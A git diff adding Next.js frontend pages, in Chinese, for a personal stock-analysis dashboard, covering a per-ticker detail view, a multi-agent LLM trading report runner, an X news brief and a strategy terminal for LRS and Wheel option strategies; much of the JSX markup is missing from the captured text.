; + const total = b.strongBuy + b.buy + b.hold + b.sell + b.strongSell || 1; + const segments = [ + { label: "强买", count: b.strongBuy, color: "bg-[#16a34a]" }, + { label: "买", count: b.buy, color: "bg-[#22c55e]" }, + { label: "持", count: b.hold, color: "bg-[#6b7280]" }, + { label: "卖", count: b.sell, color: "bg-[#f87171]" }, + { label: "强卖", count: b.strongSell, color: "bg-[#dc2626]" }, + ]; + return ( +
+
+ {segments.map((s) => ( +
+ ))} +
+
+ {segments.map((s) => ( + + {s.label} {s.count} + + ))} +
+
+ ); +} + +// ─── 详情页主组件(内部,需要 useSearchParams) ───────────────────────────── + +function StockDetailInner() { + const router = useRouter(); + const searchParams = useSearchParams(); + const ticker = searchParams.get("ticker")?.toUpperCase() ?? ""; + + const [item, setItem] = useState(null); + const [loading, setLoading] = useState(true); + const [error, setError] = useState(null); + + const loadData = useCallback(async () => { + if (!ticker) return; + setLoading(true); + setError(null); + try { + const d = await getStockTrackerLatest(); + const found = d.tickers.find((t) => t.ticker === ticker) ?? null; + setItem(found); + if (!found && d.status === "empty") { + setError("数据尚未加载,请先在「个股追踪」页面刷新数据。"); + } else if (!found) { + setError(`未找到 ${ticker} 的追踪数据。`); + } + } catch (e) { + setError(String(e)); + } finally { + setLoading(false); + } + }, [ticker]); + + useEffect(() => { + loadData(); + }, [loadData]); + + if (!ticker) { + return ( +
+ 缺少 ticker 参数。 +
+ ); + } + + const tech = (item?.technical ?? {}) as Partial; + const fund = (item?.fundamental ?? {}) as Partial; + const llm = (item?.llm ?? {}) as Partial; + + // ─── 各模块摘要文本 ───────────────────────────────────────────────────── + const fundSummary = [ + fund.pe_ttm != null ? `PE ${fund.pe_ttm.toFixed(0)}x` : null, + fund.revenue_growth_yoy != null ? `收入${fund.revenue_growth_yoy >= 0 ? "+" : ""}${fund.revenue_growth_yoy.toFixed(0)}%` : null, + fund.gross_margin != null ? `毛利 ${fund.gross_margin.toFixed(0)}%` : null, + fund.next_earnings_date ? `财报 ${fund.next_earnings_date.slice(5)}` : null, + ] + .filter(Boolean) + .join(" · "); + + const techSummary = [ + tech.pct_vs_ma150 != null ? `偏离MA150 ${fmtPct(tech.pct_vs_ma150)}` : null, + tech.rs_slope_3m != null ? `RS 3M ${tech.rs_slope_3m >= 0 ? "+" : ""}${tech.rs_slope_3m.toFixed(3)}` : null, + tech.score != null ? `评分 ${tech.score}/9` : null, + tech.extension_label ? tech.extension_label : null, + ] + .filter(Boolean) + .join(" · "); + + const llmSummary = [ + llm.stage_label || null, + llm.action_type || null, + llm.confidence ? `置信度 ${llm.confidence}` : null, + ] + .filter(Boolean) + .join(" · "); + + const chartUrl = getStockTrackerChartUrl(ticker); + + return ( +
+ {/* ─── Sticky Header ──────────────────────────────────────────────── */} +
+ {/* 面包屑 */} + + + {loading ? ( +
加载中...
+ ) : error ? ( +
{error}
+ ) : item ? ( + <> + {/* 第一行:价格信息 */} +
+ {ticker} + {item.name} + {tech.close != null && ( + + ${tech.close.toFixed(2)} + + )} + {tech.change_pct != null && ( + + {fmtPct(tech.change_pct)} + + )} +
+ {/* 第二行:Stage / 买点 / 评分 / 行业 */} +
+ {llm.stage_label && ( + + {llm.stage_label} + + )} + {llm.action_type && llm.action_type !== "待分析" && ( + + 买点:{llm.action_type} + + )} + {tech.score != null && ( + + 评分 {tech.score}/9 + + )} + {fund.industry_label && ( + + {fund.industry_label} + + )} +
+ + ) : ( +
未找到 {ticker} 的数据
+ )} +
+ + {/* ─── 主体:三大模块 ──────────────────────────────────────────────── */} + {item && ( +
+ {/* ═══════════════════════════════════════════════════════════════ */} + {/* 大模块 1:基本面分析 */} + {/* ═══════════════════════════════════════════════════════════════ */} + + {/* 1-A 估值指标 */} + + + + {(() => { + const ratio = + fund.pe_ttm != null && + fund.industry_pe_avg != null && + fund.industry_pe_avg > 0 + ? fund.pe_ttm / fund.industry_pe_avg + : null; + const cls = + ratio == null + ? "text-[#a8acc0]" + : ratio > 1.5 + ? "text-[#fbbf24]" + : ratio < 0.8 + ? "text-[#4ade80]" + : "text-white"; + return ( + + ); + })()} + + + + + + + + {/* 1-B 盈利质量 */} + + + + + + + + {/* 1-C 财报达标 */} + +
+
+
EPS 超预期
+ +
+
+
季度营收 QoQ
+ +
+
+
+ + {/* 1-D 分析师共识 */} + +
+
+ + + + + {fund.eps_guidance_range?.low != null && ( + + )} +
+
+
买/持/卖 分布
+ +
+
+
+
+ + {/* ═══════════════════════════════════════════════════════════════ */} + {/* 大模块 2:技术面分析 */} + {/* ═══════════════════════════════════════════════════════════════ */} + + {/* 2-A 趋势结构 */} + + + + + + + + + + + + {/* 2-B 动量与量能 */} + + 70 + ? "text-[#f87171]" + : tech.rsi14 > 50 + ? "text-[#22c55e]" + : "text-[#fbbf24]" + } + /> + = 0 ? "+" : "") + tech.rs_slope_3m.toFixed(3) : "—"} + valueClass={colorVal(tech.rs_slope_3m)} + /> + + + + + + + + + {/* 2-C Weinstein 图表(全宽) */} + +
+ {/* eslint-disable-next-line @next/next/no-img-element */} + {`${ticker} { + (e.target as HTMLImageElement).style.display = "none"; + }} + /> +
+ Price · MA50(蓝)· MA150(橙)· Volume · RS vs QQQ +
+
+
+
+ + {/* ═══════════════════════════════════════════════════════════════ */} + {/* 大模块 3:LLM 深度分析 */} + {/* ═══════════════════════════════════════════════════════════════ */} + + {/* 3-A 阶段判断(全宽) */} + +
+ + {llm.stage_label || "待分析"} + + + 置信度:{llm.confidence || "—"} + +
+ {llm.stage_narrative ? ( +

{llm.stage_narrative}

+ ) : ( +

+ {llm.error ? `分析错误:${llm.error}` : "暂无 LLM 分析,请刷新数据。"} +

+ )} +
+ + {/* 3-B 买点指引 */} + + + {(() => { + const stop = toNum(llm.stop_reference); + return ( + + ); + })()} + {llm.next_buy_guidance && ( +
+ {llm.next_buy_guidance} +
+ )} +
+ + {/* 3-C 催化剂监控 */} + + {llm.catalysts && llm.catalysts.length > 0 ? ( +
    + {llm.catalysts.map((c, i) => ( +
  • + · + {c} +
  • + ))} +
+ ) : ( +
暂无数据
+ )} +
+ + {/* 3-D 收入达标评估(全宽) */} + + {llm.revenue_surprise_assessment ? ( +

+ {llm.revenue_surprise_assessment} +

+ ) : ( +

暂无 LLM 分析,请刷新数据。

+ )} +
+
+
+ )} +
+ ); +} + +// ─── 导出(包裹 Suspense,因为使用了 useSearchParams) ────────────────────── + +export default function StockDetailPage() { + return ( + 加载中...
}> + + + ); +} diff --git a/frontend/src/app/strategy/page.tsx b/frontend/src/app/strategy/page.tsx new file mode 100644 index 0000000..6d23dcf --- /dev/null +++ b/frontend/src/app/strategy/page.tsx @@ -0,0 +1,6 @@ +import { StrategyTerminal } from "@/components/strategy-terminal"; + +export default function StrategyPage() { + return ; +} + diff --git a/frontend/src/app/strategy/wheel/page.tsx b/frontend/src/app/strategy/wheel/page.tsx new file mode 100644 index 0000000..69536f1 --- /dev/null +++ b/frontend/src/app/strategy/wheel/page.tsx @@ -0,0 +1,6 @@ +import { StrategyTerminal } from "@/components/strategy-terminal"; + +export default function WheelStrategyPage() { + return ; +} + diff --git a/frontend/src/app/trading-agents/page.tsx b/frontend/src/app/trading-agents/page.tsx new file mode 100644 index 0000000..79df155 --- /dev/null +++ b/frontend/src/app/trading-agents/page.tsx @@ -0,0 +1,367 @@ +"use client"; + +import { useCallback, useEffect, useRef, useState } from "react"; +import { + getTaOptions, + getTaJob, + getTaReport, + listTaReports, + runTradingAgents, + type TaJob, + type TaOptions, + type TaReportDetail, + type TaReportMeta, + type TaRunPayload, +} from "@/lib/api"; +import { ReportView } from "@/components/trading-agents/report-view"; +import { RunForm } from "@/components/trading-agents/run-form"; +import { LiveProgressPanel } from "@/components/trading-agents/live-progress-panel"; +import { HistoryList } from "@/components/trading-agents/history-list"; + +type TabKey = "run" | "history"; + +export default function TradingAgentsPage() { + const [tab, setTab] = useState("run"); + const [options, setOptions] = useState(null); + const [optionsErr, setOptionsErr] = useState(null); + + const [activeJob, setActiveJob] = useState(null); + const [runReport, setRunReport] = useState(null); + const [runErr, setRunErr] = useState(null); + + const [history, setHistory] = useState([]); + const [historyLoading, setHistoryLoading] = useState(false); + const [historyErr, setHistoryErr] = useState(null); + const [selectedReportId, setSelectedReportId] = useState(null); + const [historyReport, setHistoryReport] = useState(null); + const [historyReportLoading, setHistoryReportLoading] = useState(false); + const [historyReportErr, setHistoryReportErr] = useState(null); + + const pollRef = useRef | null>(null); + + useEffect(() => { + getTaOptions() + .then(setOptions) + .catch((err) => setOptionsErr(String(err))); + }, []); + + const loadHistory = useCallback(async () => { + setHistoryLoading(true); + setHistoryErr(null); + try { + const { reports } = await listTaReports(); + setHistory(reports); + } catch (err) { + setHistoryErr(String(err)); + } finally { + setHistoryLoading(false); + } + }, []); + + useEffect(() => { + if (tab === "history" && history.length === 0 && !historyLoading) { + loadHistory(); + } + }, [tab, history.length, historyLoading, loadHistory]); + + const stopPoll = useCallback(() => { + if (pollRef.current != null) { + clearInterval(pollRef.current); + pollRef.current = null; + } + }, []); + + useEffect(() => stopPoll, [stopPoll]); + + const startPoll = useCallback( + (jobId: string) => { + stopPoll(); + pollRef.current = setInterval(async () => { + try { + const job = await getTaJob(jobId); + setActiveJob(job); + if (job.status === "completed" || job.status === "failed") { + stopPoll(); + if (job.status === "completed" && job.report_id) { + try { + const detail = await getTaReport(job.report_id); + setRunReport(detail); + loadHistory(); + } catch (err) { + setRunErr(String(err)); + } + } + } + } catch (err) { + setRunErr(String(err)); + stopPoll(); + } + }, 1500); + }, + [stopPoll, loadHistory], + ); + + const handleSubmit = useCallback( + async (payload: TaRunPayload) => { + setRunErr(null); + setRunReport(null); + try { + const job = await runTradingAgents(payload); + setActiveJob(job); + startPoll(job.job_id); + } catch (err) { + setRunErr(String(err)); + } + }, + [startPoll], + ); + + const selectHistory = useCallback(async (reportId: string) => { + setSelectedReportId(reportId); + setHistoryReportLoading(true); + setHistoryReportErr(null); + setHistoryReport(null); + try { + const detail = await getTaReport(reportId); + setHistoryReport(detail); + } catch (err) { + setHistoryReportErr(String(err)); + } finally { + setHistoryReportLoading(false); + } + }, []); + + const submitting = + activeJob?.status === "queued" || activeJob?.status === "running"; + + return ( +
+
+
+ + psychology + + + TradingAgents + + + 多 Agent LLM 金融交易分析框架 + +
+
+ setTab("run")} + icon="play_circle" + label="运行分析" + /> + setTab("history")} + icon="history" + label="历史报告" + /> +
+
+ +
+ {tab === "run" ? ( + + ) : ( + + )} +
+
+ ); +} + +function TabButton({ + active, + onClick, + icon, + label, +}: { + active: boolean; + onClick: () => void; + icon: string; + label: string; +}) { + return ( + + ); +} + +function RunTab({ + options, + optionsErr, + activeJob, + submitting, + runReport, + runErr, + onSubmit, +}: { + options: TaOptions | null; + optionsErr: string | null; + activeJob: TaJob | null; + submitting: boolean; + runReport: TaReportDetail | null; + runErr: string | null; + onSubmit: (p: TaRunPayload) => void; +}) { + return ( +
+ +
+ {!activeJob && !runReport && ( +
+
+ + rocket_launch + +
+ 填写左侧表单并点击 Run Analysis 开始一次新分析。 +
+
+ 完整流程包括 Analyst → Research → Trader → Risk → Portfolio 五大阶段。 +
+
+
+ )} + + {activeJob && !runReport && ( +
+ +
+ )} + + {runErr && ( +
+ {runErr} +
+ )} + + {runReport && } +
+
+ ); +} + +function HistoryTab({ + history, + loading, + err, + selectedId, + report, + reportLoading, + reportErr, + onSelect, + onReload, +}: { + history: TaReportMeta[]; + loading: boolean; + err: string | null; + selectedId: string | null; + report: TaReportDetail | null; + reportLoading: boolean; + reportErr: string | null; + onSelect: (id: string) => void; + onReload: () => void; +}) { + return ( +
+ +
+ {!selectedId && ( +
+
+ + folder_open + +
+ 请选择左侧任一历史报告查看详情。 +
+
+
+ )} + {selectedId && reportLoading && ( +
加载报告中…
+ )} + {selectedId && reportErr && ( +
+ {reportErr} +
+ )} + {report && } +
+
+ ); +} diff --git a/frontend/src/app/x-brief/page.tsx b/frontend/src/app/x-brief/page.tsx new file mode 100644 index 0000000..384a901 --- /dev/null +++ b/frontend/src/app/x-brief/page.tsx @@ -0,0 +1,319 @@ +"use client"; + +import { useEffect, useMemo, useState } from "react"; +import { getXBriefLatest, refreshXBrief, XBriefData } from "@/lib/api"; + +type TweetItem = { handle: string; title: string; title_zh?: string; url: string; published_at: string }; + +export default function XBriefPage() { + const [data, setData] = useState(null); + const [loading, setLoading] = useState(true); + const [refreshing, setRefreshing] = useState(false); + const [err, setErr] = useState(""); + const [openTopics, setOpenTopics] = useState>({}); + const [openSilent, setOpenSilent] = useState(false); + const [openGaps, setOpenGaps] = useState(false); + + useEffect(() => { + getXBriefLatest() + .then((d) => setData(d)) + .catch((e) => setErr(String(e))) + .finally(() => setLoading(false)); + }, []); + + async function onRefresh() { + setRefreshing(true); + setErr(""); + try { + const d = await refreshXBrief(); + setData(d); + } catch (e) { + setErr(String(e)); + } finally { + setRefreshing(false); + } + } + + const tweets = ((data as XBriefData & { tweets?: TweetItem[] })?.tweets ?? []) as TweetItem[]; + const failedAccounts = useMemo(() => (data?.accounts ?? []).filter((x) => x.status !== "ok"), [data?.accounts]); + const silentAccounts = useMemo( + () => (data?.accounts ?? []).filter((x) => (x.tweets_count ?? 0) === 0), + [data?.accounts], + ); + + const tweetByUrl = useMemo(() => { + const m = new Map(); + tweets.forEach((t) => t.url && m.set(t.url, t)); + return m; + }, [tweets]); + + const tweetById = useMemo(() => { + const m = new Map(); + tweets.forEach((t) => { + const match = t.url?.match(/\/status\/(\d+)/); + if (match) m.set(match[1], t); + }); + return m; + }, [tweets]); + + const findTweet = (url?: string): TweetItem | null => { + if (url && tweetByUrl.has(url)) return tweetByUrl.get(url)!; + if (url) { + const match = url.match(/\/status\/(\d+)/); + if (match && tweetById.has(match[1])) return tweetById.get(match[1])!; + } + return null; + }; + + const topicCards = useMemo(() => { + return (data?.modules?.themes ?? []).slice(0, 3).map((t) => ({ + id: t.id, + title: t.title, + priority: (t.priority ?? "P1") as "P0" | "P1" | "P2", + tags: [t.subtitle || "重点主题"].filter(Boolean), + insight: (t.bullets || []).slice(0, 2).join(";") || "暂无洞见", + actionSuggestion: (t.bullets || [])[2] || "把这条主线加入下一期重点跟踪清单。", + sources: + t.samples?.map((s, i) => ({ + id: `${t.id}-${i}`, + url: s.url || "", + text: s.text || "", + handle: s.handle || "", + publishedAt: s.date || "", + })) ?? [], + })); + }, [data?.modules?.themes]); + + const usedUrls = useMemo(() => { + const set = new Set(); + topicCards.forEach((c) => c.sources.forEach((s) => s.url && set.add(s.url))); + return set; + }, [topicCards]); + + const quickReads = useMemo(() => { + const fromP0 = + data?.modules?.p0_events?.map((x) => ({ + id: x.id, + url: x.url || "", + summary: x.summary || x.title || "", + meta: x.meta || "", + })) ?? []; + const filtered = fromP0.filter((x) => !usedUrls.has(x.url)).slice(0, 8); + if (filtered.length) return filtered; + return tweets + .filter((t) => !usedUrls.has(t.url)) + .slice(0, 8) + .map((t, i) => ({ + id: `q-${i}`, + url: t.url, + summary: (t.title_zh || t.title).slice(0, 60), + meta: `@${t.handle} · ${t.published_at.slice(0, 10)}`, + })); + }, [data?.modules?.p0_events, tweets, usedUrls]); + + + const actionItems = useMemo(() => { + const fromTopics = topicCards.slice(0, 3).map((c, i) => ({ + id: `a-${i}`, + text: c.actionSuggestion, + })); + return fromTopics.length ? fromTopics : [{ id: "a-0", text: "今日无重点主题,建议先按快速扫读筛出3条候选研究线索。" }]; + }, [topicCards]); + + const headline = useMemo(() => { + if (data?.headline) return data.headline; + if (topicCards.length) return `30秒总览:${topicCards[0].title}`; + return "30秒总览:今日无明显主线,市场信息偏分散。"; + }, [data?.headline, topicCards]); + + const dateLabel = useMemo(() => { + const d = data?.generated_at || data?.period?.end_utc; + return d ? d.slice(0, 10) : "N/A"; + }, [data?.generated_at, data?.period?.end_utc]); + + return ( +
+
+
+

AI & 投资日报

+

{headline}

+

+ 日期 {dateLabel} · 抓取 {data?.overview?.total_tweets ?? 0} 条 · 保留 {data?.overview?.tweets_kept ?? "—"} 条 · 活跃账号 {data?.overview?.active_accounts ?? 0} +

+
+ +
+
+ + {(data?.trending_keywords ?? []).length > 0 && ( +
+ 热词 + {(data?.trending_keywords ?? []).map((kw, i) => ( + + {kw} + + ))} +
+ )} + +
+

今日主题卡片

+ {topicCards.length === 0 && ( +
今日无重点主题,请见快速扫读。
+ )} + {topicCards.map((card) => ( +
+
+ {card.priority === "P0" && ( + P0 + )} + {card.priority === "P1" && ( + P1 + )} + {card.priority === "P2" && ( + P2 + )} +

{card.title}

+ {card.tags.map((tag, idx) => ( + + {tag} + + ))} +
+

{card.insight}

+
+ 你可以做什么: + {card.actionSuggestion} +
+ {card.sources.length > 0 && ( +
+ + {openTopics[card.id] && ( +
    + {card.sources.map((s) => { + const hit = findTweet(s.url); + return ( +
  • +

    {hit ? `@${hit.handle} · ${hit.published_at.slice(0, 10)}` : s.handle || "来源待补充"}

    +

    {hit?.title_zh || hit?.title || s.text}

    + {s.url && ( + + 查看原文 ↗ + + )} +
  • + ); + })} +
+ )} +
+ )} +
+ ))} +
+ +
+

快速扫读

+
+ {quickReads.map((x) => ( +
+

{x.summary}

+

{x.meta}

+ {x.url && ( + + 原文 ↗ + + )} +
+ ))} + {quickReads.length === 0 &&

暂无快速扫读内容。

} +
+
+ + +
+

本期可做的事

+
+
    + {actionItems.map((a) => ( +
  • + {a.text} +
  • + ))} +
+
+
+ +
+ + {openSilent && ( +
+ {silentAccounts.length > 0 ? ( +
    + {silentAccounts.map((a) => ( +
  • + @{a.handle}({a.name}) +
  • + ))} +
+ ) : ( +

本期没有沉默账号。

+ )} +
+ )} +
+ +
+ + {openGaps && ( +
+ {failedAccounts.length > 0 ? ( +
    + {failedAccounts.map((a) => ( +
  • +

    + @{a.handle}({a.name}) +

    +

    {a.error || "抓取失败"}

    +
  • + ))} +
+ ) : ( +

本次刷新无账号抓取失败。

+ )} +
+ )} +
+ + {(loading || err) && ( +
+ {loading &&

正在加载 X 资讯简报...

} + {err &&

{err}

} +
+ )} + +
+

X资讯简报 · 手动刷新模式 · 基于多源抓取与双阶段 LLM 处理

+
+
+
+ ); +} diff --git a/frontend/src/components/nav-sidebar.tsx b/frontend/src/components/nav-sidebar.tsx new file mode 100644 index 0000000..3028fbf --- /dev/null +++ b/frontend/src/components/nav-sidebar.tsx @@ -0,0 +1,77 @@ +"use client"; + +import Link from "next/link"; +import { usePathname } from "next/navigation"; + +const NAV = [ + { href: "/", label: "仪表盘", icon: "dashboard" }, + { href: "/analysis", label: "个股分析", icon: "analytics" }, + { href: "/strategy", label: "策略", icon: "query_stats" }, + { href: "/x-brief", label: "X资讯简报", icon: "newspaper" }, + { href: "/stock-detail", label: "股票详情", icon: "monitoring" }, + { href: "/trading-agents", label: "TradingAgents", icon: "psychology" }, + { href: "/portfolio", label: "持仓", icon: "account_balance_wallet" }, + { href: "/backtesting", label: "策略回测", icon: "timeline" }, +]; + +export function NavSidebar() { + const pathname = usePathname(); + const strategyOpen = pathname === "/strategy" || pathname === "/strategy/wheel"; + + return ( +
+
    + {NAV.map((item) => { + const active = pathname === item.href; + return ( +
  • + + {item.icon} + + {item.label} + + + {item.href === "/strategy" && strategyOpen && ( +
    + + LRS + + + Wheel + +
    + )} +
  • + ); + })} +
+
+ settings + help +
+
+ ); +} + diff --git a/frontend/src/components/strategy-terminal.tsx b/frontend/src/components/strategy-terminal.tsx new file mode 100644 index 0000000..0944f5f --- /dev/null +++ b/frontend/src/components/strategy-terminal.tsx @@ -0,0 +1,416 @@ +"use client"; + +import { useEffect, useState } from "react"; +import { + askLrs, + createBacktestJob, + evaluateWheel, + getBacktestJob, + getBacktestPeriods, + getStrategyMetadata, + getWheelProfiles, + WheelEvaluation, + WheelProfile, +} from "@/lib/api"; +import { useUiStore } from "@/store/uiStore"; + +type LrsMainTab = "doc" | "dashboard" | "backtest"; +type LrsDashTab = "macro" | "base" | "validation" | "risk" | "exec"; +type WheelTab = "aggressive" | "neutral" | "conservative" | "history"; + +const LRS_DASH_TABS: Array<{ id: LrsDashTab; label: string }> = [ + { id: "macro", label: "1) 宏观经济分析(优先)" }, + { id: "base", label: "2) 基础信号" }, + { id: "validation", label: "3) 入场模式判断" }, + { id: "risk", label: "4) 风控层(资金分配)" }, + { id: "exec", label: "5) 执行层(下单)" }, +]; + +const WHEEL_TABS: Array<{ id: WheelTab; label: string }> = [ + { id: "aggressive", label: "激进" }, + { id: "neutral", label: "中性" }, + { id: "conservative", label: "保守" }, + { id: "history", label: "历史报告" }, +]; + +export function StrategyTerminal({ initialSub }: { initialSub: "LRS TQQQ策略" | "Wheel策略" }) { + const [docMd, setDocMd] = useState(""); + const [question, setQuestion] = useState(""); + const [answer, setAnswer] = useState(""); + const [askBusy, setAskBusy] = useState(false); + const [lrsTab, setLrsTab] = useState("doc"); + const [lrsDashTab, setLrsDashTab] = useState("macro"); + const [wheelTab, setWheelTab] = useState("aggressive"); + const [subOptions, setSubOptions] = useState([]); + const [loadingMeta, setLoadingMeta] = useState(true); + const [metaErr, setMetaErr] = useState(""); + const [periods, setPeriods] = useState>([]); + const [periodKey, setPeriodKey] = useState("2y"); + const [jobId, setJobId] = useState(""); + const [jobStatus, setJobStatus] = useState("-"); + const [jobError, setJobError] = useState(""); + const [jobResult, setJobResult] = useState(""); + const [runBusy, setRunBusy] = useState(false); + const [wheelProfiles, setWheelProfiles] = useState([]); + const [wheelUnderlying, setWheelUnderlying] = useState("TQQQ"); + const [wheelSignal, setWheelSignal] = useState("QQQ"); + const [wheelBusy, setWheelBusy] = useState(false); + const [wheelError, setWheelError] = useState(""); + const [wheelEval, setWheelEval] = useState(null); + + const strategySubMenu = initialSub; + const strategySubMenuFromStore = useUiStore((s) => s.strategySubMenu); + const setStrategySubMenu = useUiStore((s) => s.setStrategySubMenu); + + useEffect(() => { + Promise.all([getStrategyMetadata(), getBacktestPeriods(), getWheelProfiles()]) + .then(([meta, p, wp]) => { + setSubOptions(meta.sub_strategies); + setDocMd(meta.lrs_doc_md); + setPeriods(p); + setWheelProfiles(wp); + if (p.length > 0) setPeriodKey(p[0].key); + }) + .catch((e) => setMetaErr(String(e))) + .finally(() => setLoadingMeta(false)); + }, []); + + useEffect(() => { + if (strategySubMenuFromStore !== strategySubMenu) { + setStrategySubMenu(strategySubMenu); + } + }, [setStrategySubMenu, strategySubMenu, strategySubMenuFromStore]); + + async function onAsk() { + if (!question.trim()) return; + setAskBusy(true); + try { + const res = await askLrs(question.trim()); + setAnswer(res.answer); + } catch (e) { + setAnswer(`请求失败:${String(e)}`); + } finally { + setAskBusy(false); + } + } + + async function onRunBacktest() { + setRunBusy(true); + setJobError(""); + setJobResult(""); + try { + const job = await createBacktestJob(periodKey); + setJobId(job.job_id); + setJobStatus(job.status); + } catch (e) { + setJobError(String(e)); + } finally { + setRunBusy(false); + } + } + + async function onRefreshJob() { + if (!jobId) return; + try { + const job = await getBacktestJob(jobId); + setJobStatus(job.status); + setJobError(job.error ?? ""); + setJobResult(job.result ? JSON.stringify(job.result, null, 2) : ""); + } catch (e) { + setJobError(String(e)); + } + } + + async function onEvaluateWheel(styleKey: "aggressive" | "neutral" | "conservative") { + setWheelBusy(true); + setWheelError(""); + try { + const res = await evaluateWheel({ + style_key: styleKey, + underlying_ticker: wheelUnderlying.trim().toUpperCase(), + signal_ticker: wheelSignal.trim().toUpperCase(), + }); + setWheelEval(res); + } catch (e) { + setWheelError(String(e)); + } finally { + setWheelBusy(false); + } + } + + const isWheel = strategySubMenu === "Wheel策略"; + const activeWheelStyle = + wheelTab === "aggressive" || wheelTab === "neutral" || wheelTab === "conservative" ? wheelTab : "neutral"; + + const tabClass = (active: boolean) => + `rounded-lg px-3 py-2 text-xs font-semibold ${ + active + ? "border border-blue-500/60 bg-blue-600 text-blue-50" + : "border border-slate-700 bg-slate-900 text-slate-300 hover:border-slate-600" + }`; + + return ( +
+
+
+
+

策略

+

当前子策略:{strategySubMenu}

+
+ + ACTIVE: {strategySubMenu} + +
+
+ + {loadingMeta &&

正在加载策略配置...

} + {metaErr &&

策略数据加载失败:{metaErr}

} + + {!loadingMeta && !isWheel && ( + <> +
+
+ + + +
+
+ + {lrsTab === "doc" && ( +
+
+

LRS 策略文档

+
+
{docMd || "暂无文档内容"}
+
+
+
+

LRS 策略问答(LLM)

+